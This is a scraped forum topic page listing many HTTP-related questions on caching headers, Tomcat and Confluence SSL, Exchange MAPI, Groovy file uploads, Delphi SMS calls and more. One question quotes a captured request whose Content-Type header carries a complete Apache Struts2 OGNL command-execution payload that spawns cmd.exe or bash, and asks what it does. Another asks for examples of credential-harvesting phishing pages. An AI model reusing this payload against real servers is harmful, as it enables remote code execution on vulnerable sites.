[Last Call] Learn how to a build a cloud-first strategyRegister Now


HTTP Protocol

The Hypertext Transfer Protocol (HTTP) is an application protocol for distributed, collaborative, hypermedia information systems. Hypertext is structured text that uses logical links (hyperlinks) between nodes containing text. HTTP is the protocol to exchange or transfer hypertext. HTTP functions as a request-response protocol in the client-server computing model. HTTP is designed to permit intermediate network elements to improve or enable communications between clients and servers. HTTP is an application layer protocol designed within the framework of the Internet Protocol Suite; it presumes an underlying and reliable transport layer protocol.

Share tech news, updates, or what's on your mind.

Sign up to Post

My question is about: https://www.mnot.net/blog/2007/05/15/expires_max-age

They're saying:

The problem with that line of reasoning is that HTTP versions aren’t black and white like this; just because something advertises itself as HTTP/1.0, doesn’t mean it doesn’t understand HTTP/1.1 (see RFC2145 for more).

But here they are saying:


If a response includes both an Expires header and a max-age directive, the max-age directive overrides the Expires header, even if the Expires header is more restrictive. This rule allows an origin server to provide, for a given response, a longer expiration time to an HTTP/1.1 (or later) cache than to an HTTP/1.0 cache.

So or the article is incorrect, or W3 is incorrect (or I'm wrong :p). With the last sentence, W3 means you can give a different expiration time to a HTTP/1.1 cache (or later), compared with a HTTP/1.0 cache. You can do this by using max-age and the Expires header.
So they can only say something like that, by assuming the HTTP/1.0 cache will ignore the max-age, because otherwise you will just have the same expiration time for all the caches (HTTP/1.0 and HTTP/1.1 et cetera).

So what is true about HTTP/1.0 caches understanding max-age?
Granular recovery for Microsoft Exchange
Granular recovery for Microsoft Exchange

With Veeam Explorer for Microsoft Exchange you can choose the Exchange Servers and restore points you’re interested in, and Veeam Explorer will present the contents of those mailbox stores for browsing, searching and exporting.


In this sample GET request

GET / HTTP/1.1
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Connection: Keep-Alive

The content-type begins with something that is not normal. Is it trying to get the webserver to process it and execute something?  I also see java.lang so it is trying to call a java function.   What is it trying to do with java?

What is it doing with the command prompt and shell bash command prompt?

What is the purpose of echoing STRUSTS2045?
This is a great video (however the links no longer work):
I need a real life example of IF someone clicks on a bad link via email or whatever avenue how the redirected website collects their credentials. Anyone have any good ones?

Hi ,

We have enabled Mapi over HTTP and its set to true.
Internal all working but external i forgot to set the outlook.mijdomain.com in it so i did sucsesfull.

Now i need to set per server the authentication method as its asking from outside a password to fill in.

What will be the correct command and correct or stanaard authenthication settings?
Many thanks.

It should be something like ?

Set-MapiVirtualDirectory -Identity "Servernameexchange01\mapi (Default Web Site)" -ExternalUrl https://outlook.mydomain.com/mapi -IISAuthenticationMethods Negotiate
(not sure)
Many thanks.
I have a groovy script that makes an API call to a rest api and it gets a result. The problem is that I need to sent a file instead of a URL for the final requirements. I am not sure how to do that.

So, I need to change:
FROM: map["file_url"] = "https://i.ytimg.com/vi/JPA_rzHDy6o/maxresdefault.jpg"
TO: map["file"] = "@Nda.pdf"

I think this is a much more difficult situation, to send a file instead of a URL. I would suspect, it starts out trying to understand the def client = HttpClientBuilder.create().build() and how this api supports sending a file.

Any pointers on how to do this?

I also suspect that post.addHeader("content-type", "application/json") may not work and instead another header may have to be used. Perhaps multipart/form-data.

Script that works

import groovy.json.JsonSlurper

@Grab(group='org.apache.httpcomponents', module='httpclient', version='4.5.2')

import groovy.json.*

import org.apache.http.client.methods.*
import org.apache.http.entity.*
import org.apache.http.impl.client.*

def map = [:]
map["message"] = "Hi There"
map["title"] = "Title"
map["subject"] = "sub"
map["test_mode"] = "1"
//map["file"] = "@Nda.pdf"
map["file_url"] = "https://i.ytimg.com/vi/JPA_rzHDy6o/maxresdefault.jpg"
map["signers"] = [name: 'bob', email_address: 'ed_fletcher@aol.com']

def jsonBody = new JsonBuilder(map).toString()
println jsonBody

def url = 'https://APIKEYHERE:@api.hellosign.com/v3/signature_request/send'
def …

Server 2016
Java (32bit) Version 8 Update 151

We installed Atlassian Confluence on premises and would like to communicate to it using SSL.
Atlassian has a nice manual that we carried out.
We have a wildcard certificate (Comodo) that we wanted to use for this.

So, we created a keystore, imported the certificate (.crt) and pointed the server configfile to it:

<Connector port="8443" maxHttpHeaderSize="8192"
                   maxThreads="150" minSpareThreads="25"
                   enableLookups="false" disableUploadTimeout="true"
                   acceptCount="100" scheme="https" secure="true"
                   clientAuth="false" sslProtocols="TLSv1,TLSv1.1,TLSv1.2" sslEnabledProtocols="TLSv1,TLSv1.1,TLSv1.2" SSLEnabled="true"
                   URIEncoding="UTF-8" keystorePass="password"

Open in new window

Than we downloaded the root and intermediate certificates from Comodo and imported them in the cacerts store.
After that we restarted the Atlassian Confluence service.

We connect to Confluence using this url: https://app##.domain.local:8443

When we use Chrome we get an: ERR_SSL_VERSION_OR_CIPHER_MISMATCH error
When we use Firefox we get a: …
Hello , does anyone knwo how to transfer iPhone contacts and messages to Android phone without any loss ? i've tried many ways to transfer them , but always fail ,and i don't how to connect the differen operation phones ,
Hi All,

I have configured Issuing CA and Web server.

Issuing CA Roles (Certificate Authority)
Web server (Certificate Authority Web enrollment Service and OCSP)

When I try requesting a certificate directly through (http://issuingCA/certsrv) it is working fine the certificate can be issued through web console

While I try request using (https://webserver/certsrv) Everything is coming finally when i click submit on certificate request it through below error.

Error : CCertRequest::Submit: The RPC server is unavailable. 0x800706ba (WIN32: 1722

It is critical and really appreciated if any one can help this...

I'm working with an ecommerce API. Once the transaction is processed an HTTP post is sent to a URL of your choice with the transaction data (a way to confirm transaction on your site). This is fine, however how can I confirm the HTTP post is from the applicable source for security purposes? I tried $_SERVER['HTTP_REFERER'] but nothing is provided.
how can I disable HTTPS and enable HTTP on apache Tomcat?
Based on my researches I have to modify the server.xml in the root folder of apache tomcat. Must I modify the connector? how?
For my Webapplication I'm connecting to the port 8443
<?xml version='1.0' encoding='utf-8'?>
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at


  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  See the License for the specific language governing permissions and
  limitations under the License.
<!-- Note:  A "Server" is not itself a "Container", so you may not
     define subcomponents such as "Valves" at this level.
     Documentation at /docs/config/server.html
<Server port="-1" shutdown="SHUTDOWN">
  <!-- Security listener. Documentation at /docs/config/listeners.html
  <Listener className="org.apache.catalina.security.SecurityListener" />
  <!--APR library loader. Documentation at 

Open in new window

What does it mean to be "Always On"?
What does it mean to be "Always On"?

Is your cloud always on? With an Always On cloud you won't have to worry about downtime for maintenance or software application code updates, ensuring that your bottom line isn't affected.

How to display html detail when clicking submipls
In internet explorer i am able to access a https site and download a file. i have to use an username and password to access the site first.
However, when i enter the URL and credentials in SSIS using the HTTP connection managerand press the test connection button,  i get the message:

The remote server returned an error: (401) Unauthorized.

Any ideas why this is happening. The username and password are correct.

Can i use an https site in a http connection?

Any help appreciated.

I would like to understand the difference of persistent connection and keep alive. Is it only applicable to HTTP protocol? Thanks!
I created an htaccess file in my directory for pma.fivetier.com with the following:

order deny,allow
deny from all
allow from xx.xxx.xxx.xx

Open in new window

When trying to visit from my IP I get a testing 123... page if you visit link above you will see.   If I remove the .htaccess file I have full access again without any problem.  What am I doing wrong?  Do I need to use ipv6 address or something?
I am trying to access a website through proxy server.I am using httpclient.

This is the code which is working fine:

import org.apache.commons.httpclient.Credentials;
import org.apache.commons.httpclient.HostConfiguration;
import org.apache.commons.httpclient.HttpClient;
import org.apache.commons.httpclient.HttpMethod;
import org.apache.commons.httpclient.HttpStatus;
import org.apache.commons.httpclient.UsernamePasswordCredentials;
import org.apache.commons.httpclient.auth.AuthScope;
import org.apache.commons.httpclient.methods.GetMethod;
import java.io.IOException;
import java.net.InetSocketAddress;
import java.net.Proxy;
import java.net.ProxySelector;
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Properties;

public class Working {
private static  String PROXY_HOST = "proxy.test.org";
private static  int PROXY_PORT = 80;

    public static void main(String[] args) {
    HttpClient client = new HttpClient();
    HttpMethod method = new GetMethod("https://www.example.org");
    HostConfiguration config = client.getHostConfiguration();
    config.setProxy(PROXY_HOST, PROXY_PORT);

    try {
            if (method.getStatusCode() == HttpStatus.SC_OK) {
           String response = method.getResponseBodyAsString();
           System.out.println("Response = " + response);
    } catch (IOException e) {
    } finally {
Hi Guys,

We wrote an application that downloads json files down to about 80/90 client machines, we have reworked the mechanism but cant get it work correctly

I want to know how we could enable our server to send http status code responses then I can use the reponse.statusCode to see if a new file is available and make this whole thing a lot easier and more robust.
We just moved from WinINET to WinHTTP. The latter does not have an equivalent InternetCanonicalizeUrl function.

The WinHTTP docs say that WinHTTPOpenRequest does this automatically but there is nothing there that specifically addresses this.

According to this reference you can use WinHTTPCreateURL which uses a URL_COMPONENTS structure to define the various URL parts. In the latter the lpszExtraInfo property is where you put the ?param=xyz& ... part.

Here is my problem - one of the parameters in the paramter string needs to be canonicalized as it could contain non-URL friendly characters (Example &).

With the WinINET version we used InternetCanonicalizeUrl on the specific URL parts which were then appended to the URL string.

If we have a URL now that looks like this
mydomain.com?param='Name & Surname','Description'

Open in new window

And we pass that to WinHTTPOpenRequest - it does not know that the & in Name & Surname is data and not a parameter separator.

How do we canonicalize individual parameters in the URL with WinHTTP
I would like to setup redirection from a server that host a site to a different server that host a landing page in IIS.  

How do I setup a redirection in DNS and on the new site?

OLD URL: https://abc.domain.com
NEW URL: https://portal.domain.com/Test/Landing
Free Backup Tool for VMware and Hyper-V
Free Backup Tool for VMware and Hyper-V

Restore full virtual machine or individual guest files from 19 common file systems directly from the backup file. Schedule VM backups with PowerShell scripts. Set desired time, lean back and let the script to notify you via email upon completion.  

I have used 3 set of codes(where I used Indy10.6.2 component), which doesn't show any errors, but i can't able to send SMS through the code. Please help me to send me the Sms through Delphi code

The code which I used is...

  URL = 'https://api.bulksmsgateway.in/send/?username=****&hash=****&sender=TXTLCL&numbers=9198........&message=HISUNDAR';
  //URL = 'https://api.textlocal.in/send/?username=*****&hash=******&sender=TXTLCL&numbers=9198...&message=HISUNDAR';
  ResponseSize = 1024;
  hSession, hURL: HInternet;
  Request: String;
  ResponseLength: Cardinal;
  hSession := InternetOpen('TEST', INTERNET_OPEN_TYPE_PRECONFIG, nil, nil, 0);
    Request := Format(URL,[Username,Password,Sender,Numbers,HttpEncode(Message1)]);
    hURL := InternetOpenURL(hSession, PChar(Request), nil, 0,0,0);
      SetLength(Result, ResponseSize);
      InternetReadFile(hURL, PChar(Result), ResponseSize, ResponseLength);
      SetLength(Result, ResponseLength);

http : TIdHTTP;
IdSSL : TIdSSLIOHandlerSocketOpenSSL;
 http := TIdHTTP.Create(nil);
 IdSSL := TIdSSLIOHandlerSocketOpenSSL.Create(nil);
  Http.ReadTimeout := 30000;
  Http.IOHandler := IdSSL;
  IdSSL.SSLOptions.Method := sslvTLSv1;
  Http.Request.BasicAuthentication := True;
 // IdSSL.SSLOptions.Method := sslvTLSv1;
Hello Experts,

Somehow on some of our websites, the redirect to 443 was shut down.

How would you go about finding the missing redirects?

This is on Windows IIS.

The only thing I can think of is running scans on 80 and 443 and compare the two, but I don't think that will address the missing redirect. We do not have a Web Application Firewall to determine this.

Would the firewall reporting tools work? What the SIEM?

Thank you, your recommendations are appreciated.

We are looking for an FTP apps that we can click on a folder and get the total size of that folder, including its sub-folders; something like WinDirStat.  The most important is to get the size of the folders.  What FTP can we use?

Note: we are using FileZilla, but there is no option like what we want.
I am using the following query to get the CNAME record to load my site properly. The issue: The code below works ... but only if refreshed a couple of times.

Query ::

$recsDNS = dns_get_record($_SERVER['HTTP_HOST'], DNS_CNAME );

Not getting CNAME records Properly, SOme times coming and some times Not.

If I use DNS_ALL :: After refreshing 3 to 4 times i am getting CNAME records.

I have an application that needs to connect to a third party server on HTTPS.

App server > Bluecoat device > Firewall > Third party server

Our Bluecoat team are saying they want to block application HTTPS connections because they can't scan them. Note browser traffic uses a different proxy. So we are going to configure our service to use HTTP.

Is there a way to have this converted to HTTPS?
I have a computer here that almost daily will stop bringing up web sites.  I've read more than I can even tell you and tried  everything I could to see some rhyme or reason why this is happening.  I can ping the address from a command line or the domain name.  Outlook isn't affected even though it's hosted offsite.  I can't access the web whether I put in  the Domain name or IP in the URL field.

I've flushed the ARP cache more than once, stopped and restarted dnscache, flushed dns, scanned for trojans, malware, etc.  And the only thing that will get it running again is to restart the computer or flush dns.  We recently went through a DNS server change but we kept the same IP address.  This also doesn't affect all the computers on the domain.

This is a Windows 7 Pro PC on a 2012 R2 domain.

I can't figure it out.  I am open for ideas.

Thank you!

HTTP Protocol

The Hypertext Transfer Protocol (HTTP) is an application protocol for distributed, collaborative, hypermedia information systems. Hypertext is structured text that uses logical links (hyperlinks) between nodes containing text. HTTP is the protocol to exchange or transfer hypertext. HTTP functions as a request-response protocol in the client-server computing model. HTTP is designed to permit intermediate network elements to improve or enable communications between clients and servers. HTTP is an application layer protocol designed within the framework of the Internet Protocol Suite; it presumes an underlying and reliable transport layer protocol.

Top Experts In
HTTP Protocol